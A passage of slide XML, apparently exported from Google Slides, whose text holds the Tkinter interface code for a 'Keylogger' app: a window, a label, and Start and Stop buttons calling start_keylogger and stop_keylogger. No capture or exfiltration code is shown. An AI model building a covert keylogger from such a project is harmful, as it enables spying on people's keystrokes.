              <a:t>root.title("Keylogger")</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label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>label.config(anchor=CENTER)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>label.pack()</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start_button = Button(root, text="Start", command=start_keylogger)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>start_button.pack(side=LEFT)</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stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>stop_button.pack(side=RIGHT)</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root.geometry("250x250")</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root.mainloop()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="92000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1231075" y="1428500"/>
            <a:ext cx="108777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700">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Libre Franklin"/>
                <a:ea typeface="Libre Franklin"/>
                <a:cs typeface="Libre Franklin"/>
                <a:sym typeface="Libre Franklin"/>
              </a:rPr>
              <a:t>i</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8" name="Google Shape;148;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IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>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